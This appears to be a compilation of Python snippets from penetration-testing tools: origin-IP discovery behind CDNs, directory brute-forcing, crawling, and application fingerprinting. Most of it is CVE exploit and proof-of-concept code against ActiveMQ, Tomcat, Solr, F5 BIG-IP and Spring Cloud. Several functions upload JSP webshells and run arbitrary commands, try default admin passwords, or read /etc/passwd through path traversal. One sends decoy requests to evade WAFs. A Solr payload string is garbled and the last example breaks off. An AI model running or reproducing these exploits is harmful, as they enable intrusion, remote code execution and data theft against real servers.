Example 1
def netcat(domain, ns, count):
    A = DNSLookup(domain, ns)
    ip = socket.gethostbyname(str(ns)) if count == 0 else str(A)
    if not A:
        print(que + 'Using DIG to get the real IP')
        print('   ' + bad + 'IP not found using DNS Lookup')
    url = 'http://' + domain
    try:
        page = requests.get(url, timeout=config['http_timeout_seconds'])
        http = 'http://' if 'http://' in page.url else 'https://'
        hncat = page.url.replace(http, '').split('/')[0]
        home = page.url.replace(http, '').split(hncat)[1]
        print(que + 'Connecting to %s using Host header: %s' % (ip, domain))
        data = requests.get('http://' + ip + home,
                            headers={'host': hncat},
                            timeout=config['http_timeout_seconds'],
                            allow_redirects=False)
        count += 1
        question = 'n'  # default when the redirect prompt is not shown
        if data.status_code in [301, 302]:
            print("   " + info +
                  "Connection redirect to: %s" % data.headers['Location'])
            question = input("   " + info + 'Do you want to redirect? y/n: '
                             ) if sys.version_info[0] == 3 else raw_input(
                                 "   " + info +
                                 'Do you want to redirect? y/n: ')
        try:
            data = requests.get('http://' + ip + home,
                                headers={'host': hncat},
                                timeout=config['http_timeout_seconds'],
                                allow_redirects=True)
        except requests.exceptions.ConnectionError:
            if question in ['y', 'yes', 'ye']:
                print("   " + bad + 'Error while connecting to: %s' %
                      data.headers['Location'])
        if data.status_code == 200:
            count += 1
            sim = similarity(data.text, page.text)
            if sim > config['response_similarity_threshold']:
                print("   " + good + 'The connect has %d%% similarity to: %s' %
                      (round(100 * sim, 2), url))
                print("   " + good + '%s is the real IP' % ip)
                try:
                    quest(question='\n' + info +
                          'IP found. Do you want to stop tests? y/n: ',
                          doY='sys.exit()',
                          doN="pass")
                except KeyboardInterrupt:
                    sys.exit()
            else:
                print("   " + bad + 'The connect has %d%% similarity to: %s' %
                      (round(100 * sim, 2), url))
                print("   " + bad + "%s is not the IP" % ip)
    except requests.exceptions.SSLError:
        print("   " + bad + 'Error handshaking with SSL')
    except requests.exceptions.ReadTimeout:
        print("   " + bad + "Connection Timeout to: %s" % ip)
    except requests.ConnectTimeout:
        print("   " + bad + "Connection Timeout to: %s" % ip)
    except requests.exceptions.ConnectionError:
        print("   " + bad + "Connection Error to: %s" % ip)
Example 2
def scan(domain, host, userAgent, randomAgent, header):
    headers = dict(x.replace(' ', '').split(':', 1)
                   for x in header.split(',')) if header is not None else {}
    if randomAgent:
        headers.update({
            'User-agent':
            random.choice(
                open("data/txt/random_agents.txt").readlines()).rstrip("\n")
        })
    if userAgent is not None:
        headers.update({'User-agent': userAgent})
    try:
        print("\n" + Y + "Attempting to track real IP using: %s\n" % host)
        print(que + "Checking if {0} is similar to {1}".format(host, domain))
        get_domain = requests.get('http://' + domain,
                                  headers=headers,
                                  timeout=config['http_timeout_seconds'])
        get_host = requests.get('http://' + host,
                                headers=headers,
                                timeout=config['http_timeout_seconds'])
        page_similarity = similarity(get_domain.text, get_host.text)
        if page_similarity > config['response_similarity_threshold']:
            print(tab + good +
                  'HTML content is %.2f%% structurally similar to: %s' %
                  (round(100 * page_similarity, 2), domain))
        else:
            print(
                tab + bad +
                'Sorry, but HTML content is %.2f%% structurally similar to: %s' %
                (round(100 * page_similarity, 2), domain))
    except Exception:
        print(tab + bad + 'Connection cannot be established with: %s' % (host))
Example 3
 def cve_2016_3088_exp(self, cmd):
     self.threadLock.acquire()
     vul_name = "Apache AcitveMQ: CVE-2016-3088"
     self.path = "null"
     self.name = random_md5()
     self.webshell = "/" + self.name + ".jsp"
     self.exp = self.jsp_webshell
     self.passlist = [
         "admin:123456", "admin:admin", "admin:123123", "admin:activemq",
         "admin:12345678"
     ]
     try:
         for self.pa in self.passlist:
             self.base64_p = base64.b64encode(str.encode(self.pa))
             self.p = self.base64_p.decode('utf-8')
             self.headers_base64 = {
                 'User-Agent': self.ua,
                 'Authorization': 'Basic ' + self.p
             }
             url = urljoin(self.url, "/admin/test/systemProperties.jsp")
             self.request = requests.get(url,
                                         headers=self.headers_base64,
                                         timeout=self.timeout,
                                         verify=False)
             if self.request.status_code == 200:
                 self.path = \
                     re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0]
                 break
         self.request = requests.put(self.url + "/fileserver/v.txt",
                                     headers=self.headers_base64,
                                     data=self.exp,
                                     timeout=self.timeout,
                                     verify=False)
         self.headers_move = {
             'User-Agent':
             self.ua,
             'Destination':
             'file://' + self.path + '/webapps/api' + self.webshell
         }
         self.request = requests.request("MOVE",
                                         self.url + "/fileserver/v.txt",
                                         headers=self.headers_move,
                                         timeout=self.timeout,
                                         verify=False)
         self.raw_data = dump.dump_all(self.request).decode(
             'utf-8', 'ignore')
         self.request = requests.get(self.url + "/api" + self.webshell +
                                     "?pwd=password&cmd=" + cmd,
                                     headers=self.headers_base64,
                                     timeout=self.timeout,
                                     verify=False)
         self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n"
         self.r += self.request.text
         verify.exploit_print(self.r, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
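The random_md5 helper used here (and in Examples 4 and 27) is not defined in this listing; a minimal sketch, assuming it returns a random MD5 hex digest used as an unpredictable filename or marker:

import hashlib
import random

def random_md5():
    # Assumed behavior: hex digest of a random value, giving an
    # unpredictable 32-character token for filenames and markers.
    return hashlib.md5(str(random.random()).encode()).hexdigest()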
Example 4
 def cve_2019_0193_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2019-0193"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2019-10-16"
     self.vul_info["vul_vers"] = "< 8.2.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
                                 "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
     self.vul_info["cre_auth"] = "zhzyker"
     core_name = "null"
     md = random_md5()
     cmd = "echo " + md
     payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8'))
     solrhost = self.hostname + ":" + str(self.port)
     headers = {
         'Host': "" + solrhost,
         'User-Agent': self.ua,
         'Accept': "application/json, text/plain, */*",
         'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
         'Accept-Encoding': "zip, deflate",
         'Referer': self.url + "/solr/",
         'Content-type': "application/x-www-form-urlencoded",
         'X-Requested-With': "XMLHttpRequest",
         'Connection': "close"
     }
     urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except Exception:
             pass
         urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json"
         request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False)
         url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
         request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False)
         if request.status_code == 200 and core_name != "null":
             self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoC_MaYbE"
             self.vul_info["prt_info"] = "[maybe] [core name:" + url_cmd + "] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
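The PoC above sends "echo <random md5>" but only checks the HTTP status code, which is why it reports "PoC_MaYbE". A stricter check (a sketch, not part of the original code) would look for the echoed marker in the response body:

def confirmed_execution(response_text, marker):
    # The payload ran "echo <marker>"; the command really executed only
    # if the marker string comes back in the HTTP response body.
    return marker in response_text

# e.g. confirmed_execution(request.text, md) after the POST to /dataimport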
Example 5
def IPscan(domain, ns, A):
    url = 'http://' + domain
    if A is not None:
        try:
            print(que + 'Using DIG to get the real IP')
            print("   " + good + 'Possible IP: %s' % str(A))
            print(que + 'Retrieving target homepage at: %s' % url)
            try:
                org_response = requests.get(
                    url, timeout=config['http_timeout_seconds'])
            except requests.exceptions.Timeout:
                sys.stderr.write("   " + bad +
                                 "%s timed out after %d seconds\n" %
                                 (url, config['http_timeout_seconds']))
                return None
            except requests.exceptions.RequestException:
                sys.stderr.write("   " + bad + "Failed to retrieve %s\n" % url)
                return None
            if org_response.status_code != 200:
                print('   ' + bad +
                      'Responded with an unexpected HTTP status code')
            if org_response.url != url:
                print('   ' + good + '%s redirects to %s' %
                      (url, org_response.url))
                print("   " + good +
                      "Request redirected successful to %s" % org_response.url)
            try:
                sec_response = requests.get(
                    'http://' + str(A), timeout=config['http_timeout_seconds'])
                if sec_response.status_code != 200:
                    print('   ' + bad +
                          'Responded with an unexpected HTTP status code')
                else:
                    page_similarity = similarity(sec_response.text,
                                                 org_response.text)
                    if page_similarity > config[
                            'response_similarity_threshold']:
                        print(
                            que +
                            'Testing if source body is the same in both websites'
                        )
                        print(
                            '   ' + good +
                            ' HTML content is %.2f%% structurally similar to: %s'
                            % (round(100 * page_similarity, 2),
                               org_response.url))
            except Exception:
                print("   " + bad + "Connection Timeout")
            netcat(domain, ns, count=1)
            return org_response
        except requests.exceptions.SSLError:
            print("   " + bad + 'Error handshaking with SSL')
        except requests.exceptions.ReadTimeout:
            print("   " + bad + "Connection Timeout")
        except requests.ConnectTimeout:
            print("   " + bad + "Connection Timeout")
Example 6
 def _safeRequest(self, safeURL):
     '''
     Safe request: a decoy request used to evade WAFs and similar security devices
     '''
     if not safeURL:
         return
     #url = random.choice(safeURL.split())
     try:
         http.get(safeURL)
     except http.ConnectionError:
         pass
Example 8
 def cve_2021_27905_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
     self.vul_info["vul_numb"] = "CVE-2021-27905"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2021-04-14"
     self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "SSRF"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Apache Solr is an open-source search engine written in Java, built mainly " \
                                 "on HTTP and Apache Lucene. The flaw lies in the masterUrl (leaderUrl) " \
                                 "parameter of the ReplicationHandler, which can direct the ReplicationHandler " \
                                 "of another Solr core to replicate index data to the local core. Successful " \
                                 "exploitation results in server-side request forgery (SSRF)."
     self.vul_info["cre_auth"] = "zhzyker"
     core_name = None
     dns = dns_request()
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except Exception:
             pass
         payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
                   "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
         url_ssrf = urljoin(self.url, payload)
         r = requests.get(url_ssrf,
                          headers=self.headers,
                          timeout=self.timeout,
                          verify=False)
         if dns in dns_result(dns):
             self.vul_info["vul_payd"] = url_ssrf
             self.vul_info["vul_data"] = dump.dump_all(r).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Example 9
 def cve_2019_17558_exp(self, cmd):
     vul_name = "Apache Solr: CVE-2019-17558"
     core_name = None
     payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except (ValueError, KeyError, IndexError):
             pass
         url_api = self.url + "/solr/" + str(core_name) + "/config"
         headers_json = {
             'Content-Type': 'application/json',
             'User-Agent': self.ua
         }
         set_api_data = """
         {
           "update-queryresponsewriter": {
             "startup": "lazy",
             "name": "velocity",
             "class": "solr.VelocityResponseWriter",
             "template.base.dir": "",
             "solr.resource.loader.enabled": "true",
             "params.resource.loader.enabled": "true"
           }
         }
         """
         request = requests.post(url_api,
                                 data=set_api_data,
                                 headers=headers_json,
                                 timeout=self.timeout,
                                 verify=False)
         request = requests.get(self.url + "/solr/" + str(core_name) +
                                payload_2,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
Example 10
 def cve_2020_5902_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2020-5902"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
     self.vul_info["vul_numb"] = "CVE-2020-5902"
     self.vul_info["vul_apps"] = "Flink"
     self.vul_info["vul_date"] = "2020-07-15"
     self.vul_info["vul_vers"] = "< 11.6.x"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "The Traffic Management User Interface (TMUI), also referred to as the " \
                                 "Configuration utility, has a Remote Code Execution (RCE) vulnerability in " \
                                 "undisclosed pages. (CVE-2020-5902)"
     self.vul_info["cre_date"] = "2021-03-20"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(
         self.url,
         "/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=CVE-2020-5902")
     try:
         request = requests.get(url,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         if request.status_code == 200 and r"CVE-2020-5902" in request.text:
             url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
             request = requests.get(url,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
             if r"root:x:0:0:" in request.text and r"daemon:x:" in request.text and r"nologin" in request.text:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
                 self.vul_info["vul_payd"] = url
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[rce] [url:" + url + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Example 11
 def request(self, path):
     i = 0
     proxy = None
     result = None
     while i <= self.maxRetries:
         try:
             if self.proxy is not None:
                 proxy = {"https" : self.proxy, "http" : self.proxy}
             url = "{0}://{1}:{2}".format(self.protocol, self.host, self.port)
             url = urllib.parse.urljoin(url, self.basePath)
             url = urllib.parse.urljoin(url, path)
             headers = dict(self.headers)
             if self.randomAgents is not None:
                 headers["User-agent"] = random.choice(self.randomAgents)
             response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, headers=headers, timeout=self.timeout)
             result = Response(response.status_code, response.reason, response.headers, response.content)
             del headers
             break
         except requests.exceptions.ConnectionError as e:
             if self.proxy is not None:
                 raise RequestException({'message': 'Error with the proxy: {0}'.format(e)})
             continue
         except requests.exceptions.ReadTimeout:
             continue
         except requests.exceptions.Timeout:
             continue
         finally:
             i = i + 1
     if i > self.maxRetries:
         raise RequestException({'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)})
     return result
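Examples 11, 15 and 47 wrap the raw requests response in a Response object whose class is not shown. A minimal sketch consistent with the positional arguments used above (the field names are assumptions):

class Response(object):
    # Assumed container matching Response(status_code, reason, headers, content).
    def __init__(self, status, reason, headers, body):
        self.status = status
        self.reason = reason
        self.headers = headers
        self.body = body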
Example 12
    def crawlerThread():
        global countVisitedUrls

        while visitQueue.qsize() > 0:
            url = visitQueue.get()
            try:
                hashData = hashUrl(url)
                if hashData not in visited:
                    headers[HTTP_HEADER.USER_AGENT] = randomUserAgents()
                    response = requests.get(url, timeout=10, headers=headers)
                    crawlMsg = 'crawled %s depth: %d count: %d' % (url, currentDepth, countVisitedUrls)
                    logger.log(CUSTOM_LOGGING.SYSINFO, crawlMsg)
                    content = response.text

                    kb.pageEncoding = response.encoding
                    conf.cookie = str(response.cookies.get_dict())

                    try:
                        lock.acquire()
                        visited.add(hashData)
                        countVisitedUrls += 1
                        fp.write(url + '\n')
                        lock.release()
                    except Exception as ex:
                        logger.log(CUSTOM_LOGGING.ERROR, ex)
                        if lock.locked():
                            lock.release()
                        continue
                else:
                    continue
            except Exception as ex:
                logger.log(CUSTOM_LOGGING.ERROR, ex)
Example 13
 def start(url, webapps_identify):
     ua = globals.get_value("UA")  # fetch the global UA
     timeout = globals.get_value("TIMEOUT")  # fetch the global TIMEOUT
     headers = {'User-Agent': ua}
     try:
         resp = requests.get(url, headers=headers, timeout=timeout, verify=False)
     except Exception:
         resp = "null"
     start = Identify(url)
     start.flink(webapps_identify, resp, url)
     start.tomcat(webapps_identify, resp, url)
     start.fastjson(webapps_identify, url)
     start.elasticsearch(webapps_identify, resp, url)
     start.jenkins(webapps_identify, resp, url)
     start.weblogic(webapps_identify, resp, url)
     start.spring(webapps_identify, resp, url)
     start.solr(webapps_identify, resp, url)
     start.nexus(webapps_identify, resp, url)
     start.jboss(webapps_identify, resp, url)
     start.drupal(webapps_identify, resp, url)
     start.struts2(webapps_identify, resp, url)
     start.shiro(webapps_identify, resp, url)
     start.druid(webapps_identify, resp, url)
     start.eyou(webapps_identify, resp, url)
     start.coremail(webapps_identify, resp, url)
     if webapps_identify:
         for a in webapps_identify:
             print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" The identification target is: " + a + "          ")))
     else:
         webapps_identify.append("all")
         print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" Unable to identify target, Run all pocs           ")))
Example 14
 def spring(self, webapps_identify, resp, url):
     name = "Spring"
     time.sleep(0.1)
     Identify.identify_prt(name)
     try:
         if r"timestamp" in resp.text and r"status" in resp.text and r"path" in resp.text and r"message" in resp.text:
             webapps_identify.append("spring")
         elif 'WWW-Authenticate' in resp.headers:
             if r"Spring" in resp.headers['WWW-Authenticate'] and r"Basic" in resp.headers['WWW-Authenticate']:
                 webapps_identify.append("spring")
         elif 'Www-Authenticate' in resp.headers:
             if r"Spring" in resp.headers['Www-Authenticate'] and r"Basic" in resp.headers['Www-Authenticate']:
                 webapps_identify.append("spring")
         elif r"X-Application-Context" in resp.headers:
             webapps_identify.append("spring")
         else:
             r = requests.get(self.url + "/233/233/233", headers=self.headers, timeout=self.timeout, verify=False)
             if r"timestamp" in r.text and r"status" in r.text and r"path" in r.text and r"message" in r.text:
                 webapps_identify.append("spring")
             elif 'WWW-Authenticate' in r.headers:
                 if r"Spring" in r.headers['WWW-Authenticate'] and r"Basic" in r.headers['WWW-Authenticate']:
                     webapps_identify.append("spring")
             elif 'Www-Authenticate' in r.headers:
                 if r"Spring" in r.headers['Www-Authenticate'] and r"Basic" in r.headers['Www-Authenticate']:
                     webapps_identify.append("spring")
             elif r"X-Application-Context" in r.headers:
                 webapps_identify.append("spring")
     except Exception:
         pass
Example 15
    def request(self, path):
        i = 0
        proxy = None
        result = None
        while i <= self.maxRetries:
            try:
                if self.proxy is not None:
                    proxy = {"https": self.proxy, "http": self.proxy}
                if self.requestByHostname:
                    url = "{0}://{1}:{2}".format(self.protocol, self.host,
                                                 self.port)
                else:
                    url = "{0}://{1}:{2}".format(self.protocol, self.ip,
                                                 self.port)
                url = urllib.parse.urljoin(url, self.basePath)

                # Joining with concatenation because a urljoin bug with "::"
                if not url.endswith('/'):
                    url += "/"
                if path.startswith('/'):
                    path = path[1:]
                url += path

                headers = dict(self.headers)
                if self.randomAgents is not None:
                    headers["User-agent"] = random.choice(self.randomAgents)
                headers["Host"] = self.host
                # include port in Host header if it's non-standard
                if (self.protocol == "https"
                        and self.port != 443) or (self.protocol == "http"
                                                  and self.port != 80):
                    headers["Host"] += ":{0}".format(self.port)

                response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, \
                                        headers=headers, timeout=self.timeout)
                result = Response(response.status_code, response.reason,
                                  response.headers, response.content)
                del headers
                break
            except requests.exceptions.TooManyRedirects as e:
                raise RequestException(
                    {'message': 'Too many redirects: {0}'.format(e)})
            except ConnectionResetError as e:
                raise RequestException(
                    {'message': 'ConnectionResetError: {0}'.format(e)})
            except requests.exceptions.ConnectionError as e:
                if self.proxy is not None:
                    raise RequestException(
                        {'message': 'Error with the proxy: {0}'.format(e)})
                continue
            except (requests.exceptions.ReadTimeout, requests.exceptions.Timeout, http.client.IncompleteRead, \
                    socket.timeout):
                continue
            finally:
                i = i + 1
        if i > self.maxRetries:
            raise RequestException(\
                {'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)}
                )
        return result
Example 16
 def cve_2017_12615_exp(self, cmd):
     vul_name = "Apache Tomcat: CVE-2017-12615"
     self.name = random_md5()
     self.webshell = "/" + self.name + ".jsp/"
     self.payload1 = self.name
     self.payload2 = self.payload_cve_2017_12615
     try:
         self.req = requests.put(self.url + self.webshell,
                                 data=self.payload2,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         self.urlcmd = self.url + "/" + self.name + ".jsp?pwd=password&cmd=" + cmd
         self.request = requests.get(self.urlcmd,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         self.r = "Put Webshell: " + self.urlcmd + "\n-------------------------\n" + self.request.text
         raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
         verify.exploit_print(self.r, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception as e:
         verify.error_print(vul_name)
Example 17
    def get_page_source_info(self, url, headers, cookies, times=0):
        if times < 3:
            try:
                # test proxy
                # proxy_switch.link_proxy(self.proxy)
                req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout)
                if req.status_code == 200:
                    # get the page encoding
                    encoding = None
                    try:
                        encoding = req.apparent_encoding
                        if encoding is not None:
                            encoding = encoding.lower()
                            encoding = encoding if 'utf' in encoding or 'gbk' in encoding else None
                    except Exception as e:
                        log.output_log("".join(["[error] ", str(e)]), True)

                    encoding = self.get_page_charset(req.content) if encoding is None else encoding
                    req.encoding = "utf-8" if encoding is None else encoding
                    html = req.text
                    req.close()
                    return [html, encoding]
                
                if req.status_code == 403:
                    times += 1
                    log.output_log("[error] 403, retrying connect %d" % times, True)
                    proxy_switch.link_proxy(self.proxy)
                    return self.get_page_source_info(url, headers, cookies, times)
                return None
            
            except Exception as e:
                log.output_log("".join(["[error] ", str(e)]), True)
                return None
Example 18
def proxy_set(pr, pr_mode):
    headers = globals.get_value("HEADERS")  # fetch the global HEADERS
    try:
        proxy_ip = str(re.search(r"(.*):", pr).group(1))
        proxy_port = int(re.search(r":(.*)", pr).group(1))
    except AttributeError:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " Proxy format error (e.g. --proxy-socks 127.0.0.1:1080)"))
        sys.exit(0)
    if r"socks" in pr_mode:
        socks.set_default_proxy(socks.SOCKS5, proxy_ip, proxy_port)
    elif r"http" in pr_mode:
        socks.set_default_proxy(socks.HTTP, addr=proxy_ip, port=proxy_port)
    socket.socket = socks.socksocket
    try:
        proxy_ip_info = requests.get("http://api.hostip.info/get_json.php",
                                     headers=headers,
                                     timeout=5)
        proxy_ip_info_json = json.loads(proxy_ip_info.text)
        proxy_ip_info_dict = "[region: " + proxy_ip_info_json[
            "country_name"] + "] " + "[city: " + proxy_ip_info_json[
                "city"] + "] " + "[proxy ip: " + proxy_ip_info_json["ip"] + "]"
    except requests.exceptions.ConnectionError:
        proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
    except requests.exceptions.Timeout:
        proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
    print(
        now.timed(de=0) + color.yel_info() +
        color.yellow(" Use custom proxy: " + pr))
    print(
        now.timed(de=0) + color.yel_info() +
        color.yellow(" Proxy info: " + proxy_ip_info_dict))
Example 19
 def cve_2020_5410_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Cloud: CVE-2020-5410"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a"
     self.vul_info["vul_name"] = "Spring Cloud Config目录穿越漏洞"
     self.vul_info["vul_numb"] = "CVE-2020-5410"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2020-06-02"
     self.vul_info["vul_vers"] = "< 2.2.3, < 2.1.9"
     self.vul_info["vul_risk"] = "medium"
     self.vul_info["vul_type"] = "目录穿越漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x" \
                                 "版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。" \
                                 "恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。"
     self.vul_info["cre_date"] = "2021-01-26"
     self.vul_info["cre_auth"] = "zhzyker"
     try:
         request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False)
         if request.status_code == 200:
             if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Example 20
    def get_page_source_info(self, url, headers, cookies, times=0):
        if times < 3:
            try:
                # test proxy
                proxy_switch.link_proxy(self.proxy)
                req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout)
                if req.status_code == 200:
                    # get the page encoding
                    encoding = None
                    try:
                        encoding = req.apparent_encoding
                        if encoding is not None:
                            encoding = encoding.lower()
                            encoding = encoding if 'utf' in encoding or 'gbk' in encoding else None
                    except Exception as e:
                        log.output_log("[error] " + str(e), True)

                    encoding = self.get_page_charset(req.content) if encoding is None else encoding
                    req.encoding = "utf-8" if encoding is None else encoding
                    html = req.text
                    req.close()
                    return [html, encoding]
                
                if req.status_code == 403:
                    times += 1
                    log.output_log("[error] 403, retrying connect %d" % times, True)
                    proxy_switch.link_proxy(self.proxy)
                    return self.get_page_source_info(url, headers, cookies, times)
                return None
            
            except Exception as e:
                log.output_log("[error] " + str(e), True)
                return None
Example 21
 def cve_2019_3799_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Cloud: CVE-2019-3799"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
     self.vul_info["vul_name"] = "Spring-Cloud-Config-Server Directory Traversal"
     self.vul_info["vul_numb"] = "CVE-2019-3799"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2019-04-22"
     self.vul_info["vul_vers"] = "2.1.0-2.1.1, 2.0.0-2.0.3, 1.4.0-1.4.5"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Directory Traversal"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "由于spring-cloud-config-server模块未对传入路径进行安全限制," \
                                 "攻击者可以利用多个..%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。"
     self.vul_info["cre_date"] = "2021-01-27"
